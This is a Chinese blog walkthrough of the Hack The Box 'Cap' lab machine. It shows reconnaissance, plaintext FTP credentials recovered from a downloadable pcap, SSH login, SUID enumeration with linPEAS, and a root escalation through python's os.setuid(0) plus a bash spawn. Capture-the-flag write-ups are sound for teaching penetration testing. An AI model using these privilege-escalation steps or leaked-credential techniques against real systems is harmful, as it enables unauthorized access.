HTB_Cap

Cap

nmap扫一下,开放21ftp端口

image

尝试匿名登录

登陆失败了,访问一下10.10.10.245

image

点一下左面的Security Snopshot

image

尝试了很多数字,只有data/0显示的内容有不同

image

点击download下载pcap之后用wireshark分析

比较在意那个FTP里面会不会有登录的用户名密码

明文传输

image

1
2
用户名 nathan
密码 Buck3tH4TF0RM3!

得到了用户名密码,ssh登录一下

ssh nathan@10.10.10.245

image

先拿到了第一个普通用户的flag

image

下一步就是找到提权方式

find / -perm /6000 2>/dev/null

看看有哪些文件可以进行读写

image

于是可以通过linPEAS来进行提权

image

于是可以看一下怎么用python改变setuid

1
2
3
import os
os.setuid(0)
os.system("/bin/bash")

image

Hack The Box
#htb #渗透
HTB_Cap
http://example.com/post/cap-lewk0.html
作者
Dre4m
发布于
2025年4月3日
许可协议